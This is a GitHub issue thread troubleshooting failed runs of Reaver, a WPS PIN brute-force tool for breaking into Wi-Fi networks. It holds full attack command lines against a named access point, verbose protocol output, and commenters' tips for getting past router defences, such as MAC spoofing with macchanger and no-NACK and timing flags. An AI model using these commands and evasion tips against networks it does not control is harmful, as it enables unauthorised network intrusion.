search

chrsmithdemos / reaver-wps

Automatically exported from code.google.com/p/reaver-wps
7 stars 3 forks source link

WPS transaction failed (code: 0x02, 0x03, 0x04) and Receive timeout occurred #222

Open GoogleCodeExporter opened 9 years ago

GoogleCodeExporter commented 9 years ago 
0. Version of Reaver: v1.4

1. OS: BackTrack 5 R1 32 Bit Gnome

2. Wireless card: Alfa AWUS036NHR (Chipset: RTL8188RU) with compat-wireless 
driver (rtl8192cu)

3. Monitor mode enabled: Yes, aireplay-ng -9 -i mon0 wlan1 -> Injection 
successful.

4. Signal strength of the Access Point: -35

First try with standard parameters:

reaver -i mon0 -b 88:25:2C:F8:B7:30 -c 6 -vv --mac=00:BD:AF:FA:EF:37

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Switching mon0 to channel 6
[+] Waiting for beacon from 88:25:2C:F8:B7:30
[+] Associated with 88:25:2C:F8:B7:30 (ESSID: WLAN-F8B717)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete @ 2012-02-05 11:36:24 (0 seconds/pin)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
^C
[+] Nothing done, nothing to save.

pcap-file: standard.pcap

Second try with modified parameters (--no-nacks and -d 15, as mentioned in 
other issues):

reaver -i mon0 -b 88:25:2C:F8:B7:30 -c 6 -vv --no-nacks -d 15 
--mac=00:BD:AF:FA:EF:37

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Switching mon0 to channel 6
[+] Waiting for beacon from 88:25:2C:F8:B7:30
[+] Associated with 88:25:2C:F8:B7:30 (ESSID: WLAN-F8B717)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
^C
[+] Nothing done, nothing to save.

pcap-file: modified_parameters.pcap

Output of wash:

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

BSSID                  Channel       RSSI       WPS Version       WPS Locked    
    ESSID
--------------------------------------------------------------------------------
-------------------------------
88:25:2C:F8:B7:30       6            -35        1.0               No            
    WLAN-F8B717

Output of airodump-ng:

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID  

88:25:2C:F8:B7:30  -36       72        1    0   6  54e. WPA2 CCMP   PSK  
WLAN-F8B717

Note: I just emailed you the both pcap-files, because the issue attachment 
storage quoata here exceeded. :-)
I also tried to shutdown the router and start it again (-> reboot), but it does 
not help. Same problem.

Thank you very much! :-)

Original issue reported on code.google.com by sim.stamm on 5 Feb 2012 at 11:09

GoogleCodeExporter commented 9 years ago 
Please read http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf

The hardware of some APs are not very good, low cache, low memory.

In your case, I believe it will have to be patient. Gradually you get it

Original comment by gcarval...@gmail.com on 7 Feb 2012 at 4:27

GoogleCodeExporter commented 9 years ago 
I have the same issue. Hope it isn't a signal problem. I have -68 to -78 RSSI, 
but nothing, it stuck on the first pin. Tomorrow I'll try to let him a few 
hours with the same pin. (Sorry for my english, anyway.)

Original comment by davideb...@gmail.com on 3 Mar 2012 at 11:26

GoogleCodeExporter commented 9 years ago 
Try changing your mac address using macchanger. the router may have protection 
enabled.

Mine worked after changing macchanger.

/usr/local/bin/macchanger -r wlan0

Original comment by 88sale...@gmail.com on 19 Apr 2012 at 4:23

GoogleCodeExporter commented 9 years ago 
100% works! tested
http://www.youtube.com/watch?v=hg19ThwjR5Q

Original comment by eddiekar...@gmail.com on 21 Apr 2012 at 11:54

GoogleCodeExporter commented 9 years ago 
same problem here:
i have the netgear wg111v3 with the rtl8187 chipset/driver.

after "Sending EAPOL START request" i get a WARNING: timeout following right 
away

after some failures i get:

Sending WSC NACK
WPS transaction failed (code: 0x02), re-trying last pin

Original comment by xeddo.xe...@googlemail.com on 23 Apr 2012 at 3:47

GoogleCodeExporter commented 9 years ago 
I have found that if you are running this from a virtual machine stored on 
external media i.e. hard drive sd card, etc... It will create this issue. 

If this is the case then try moving the VM to your computers hard drive.

I have tried this on various types of media 250GB WD Drive, 32GB Micro SD Card, 
and 8GB Thumb Drive and have had this error each time I have experimented with 
it. 

There are also some standard things I have taken into consideration when 
testing reaver and will post them on here.

Original comment by mwd451...@gmail.com on 2 Jul 2012 at 8:44

GoogleCodeExporter commented 9 years ago 
i had the same issue and solved it with a directional antenna and the 
--no-nacks command, if the pwr is > 55 it speeds up the process and deletes the 
errors

Original comment by karlhein...@gmail.com on 15 Dec 2014 at 4:00

dasReaver commented 8 years ago

reaver -i wlan3mon -c # -b xx:xx:xx:xx:xx:xx -vv -no-nacks -L -N -d 15 -T .5 -r 3:15

PWR: -91

took me 2 weeks

WPS Manufacturer: THOMSON [P] WPS Model Name: Thomson TG [P] WPS Model Number: 784

TP-LINK WN722N Kali 2.0 (no VMWare)

biirchin commented 8 years ago

same problem here:

wireless card working fine TP-LINK TL-WN722N 2.4 GHz…

reaver -i wlan0mon -c # -b xx:xx:xx:xx:xx:xx -vv

WPS transaction failed (code: 0x04), re-trying last pin

AuthKey: e8:73:de:ab:f8:a2:5b:5b:41:75:d1:fd:2a:0d:06:37:26:a1:2d:82:ac:2b:7d:5a:fc:d4:57:31:55:89:14:1d

[+] Sending M2 message [+] Received WSC NACK [+] Sending WSC NACK [!] WPS transaction failed (code: 0x04), re-trying last pin [+] Trying pin 12345670. [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [P] E-Nonce: 45:a7:34:40:b2:d2:fb:aa:7a:f4:c2:76:f9:eb:14:dc [P] PKE: 22:14:c6:5b:77:e8:78:d4:b8:bb:64:2b:2d:23:09:60:82:37:38:9e:7a:ce:1c:5b:8f:ae:8b:e0:1a:a9:6b:3e:82:78:f8:ee:f9:84:0a:f1:56:bd:fb:70:4e:18:c0:ad:12:2e:b4:ca:db:b6:c9:78:d6:5f:e8:3b:db:ea:da:ce:0c:eb:cd:dd:c9:1b:23:eb:08:27:d9:08:f9:3c:07:f0:4c:9f:45:73:13:aa:30:96:9e:5b:3a:98:38:c2:5a:89:1f:22:0b:0c:02:a4:93:1d:5a:41:8c:4f:25:e4:7a:87:90:20:e2:3e:c1:e5:83:8e:29:de:82:ce:22:ee:c4:fa:8f:d5:44:a9:83:f8:50:66:e4:8f:35:0c:f6:9c:4c:45:eb:2a:fb:28:92:fa:d7:9e:b6:20:4c:8c:96:90:bd:96:d8:f5:18:80:2a:13:7e:22:29:9c:e7:bf:6d:43:28:7d:8a:60:ac:a1:47:ec:46:1b:52:bd:a6:3e:d8:df:13:58 [P]WPS Manufacturer: Ralink Technology, Corp. [P] WPS Model Name: Ralink Wireless Access Point [P] WPS Model Number: RT2860 [P] Access Point Serial Number: 12345678 [+] Received M1 message [P] R-Nonce: 9d:a2:7d:d8:5b:fa:9b:79:a9:71:0a:5a:09:fa:2f:ad [P]PKR::00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02 [P]AuthKey:f2:c7:3d:a7:19:e1:73:09:ac:76:f2:de:d8:18:c0:e0:a8:75:99:88:4b:80:2a:c8:e1:4f:9d:d9:79:45:f3:9c [+] Sending M2 message [+] Received WSC NACK [+] Sending WSC NACK [!] WPS transaction failed (code: 0x04), re-trying last pin [+] Nothing done, nothing to save. [+] 0.00% complete. Elapsed time: 0d0h39m41s. [+] Trying pin 12345670. [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [P] E-Nonce: 45:a7:34:40:b2:d2:fb:aa:7a:f4:c2:76:f9:eb:14:dc [P] PKE: 22:14:c6:5b:77:e8:78:d4:b8:bb:64:2b:2d:23:09:60:82:37:38:9e:7a:ce:1c:5b:8f:ae:8b:e0:1a:a9:6b:3e:82:78:f8:ee:f9:84:0a:f1:56:bd:fb:70:4e:18:c0:ad:12:2e:b4:ca:db:b6:c9:78:d6:5f:e8:3b:db:ea:da:ce:0c:eb:cd:dd:c9:1b:23:eb:08:27:d9:08:f9:3c:07:f0:4c:9f:45:73:13:aa:30:96:9e:5b:3a:98:38:c2:5a:89:1f:22:0b:0c:02:a4:93:1d:5a:41:8c:4f:25:e4:7a:87:90:20:e2:3e:c1:e5:83:8e:29:de:82:ce:22:ee:c4:fa:8f:d5:44:a9:83:f8:50:66:e4:8f:35:0c:f6:9c:4c:45:eb:2a:fb:28:92:fa:d7:9e:b6:20:4c:8c:96:90:bd:96:d8:f5:18:80:2a:13:7e:22:29:9c:e7:bf:6d:43:28:7d:8a:60:ac:a1:47:ec:46:1b:52:bd:a6:3e:d8:df:13:58

Any solution?

Luck161 commented 8 years ago

@biirchin

I'm having the same issue, and every time I look for an answer on a forum or website, there are either no answers that help or people just don't respond to this issue. Want to at least know what causes the issue... an explanation on how to fix it would be extra lol. Let me know if you have fixed this issue since then, would really help! Thanks

dasReaver commented 8 years ago

WPS transactio failed reasons:

  1. weak ap signal
  2. wash -i command claims router to have wps enabled when its really not or wps is 2.0
Luck161 commented 8 years ago

Here's the issue, reaver was working at first (I made sure to check signal strength) and I paused it to test reaver's resume feature, but when I retried, it gives me those errors. I had the same AP signal strength as when it was working, I used the same command, I also tried to delete the file that saved the progress to see if that was the issue but that didnt work. I have tried various different command options and none of them have resulted in success that I was having. What could be the issue?

MauOchoa commented 4 years ago

HEY, maybe it is too late but this solved the issue for me, https://www.youtube.com/watch?v=4lJSRa9sXF8

yin2hao commented 1 month ago

HEY, maybe it is too late but this solved the issue for me, https://www.youtube.com/watch?v=4lJSRa9sXF8

It's never too late to solve a problem, but I'm sorry to say that nothing happened after actions.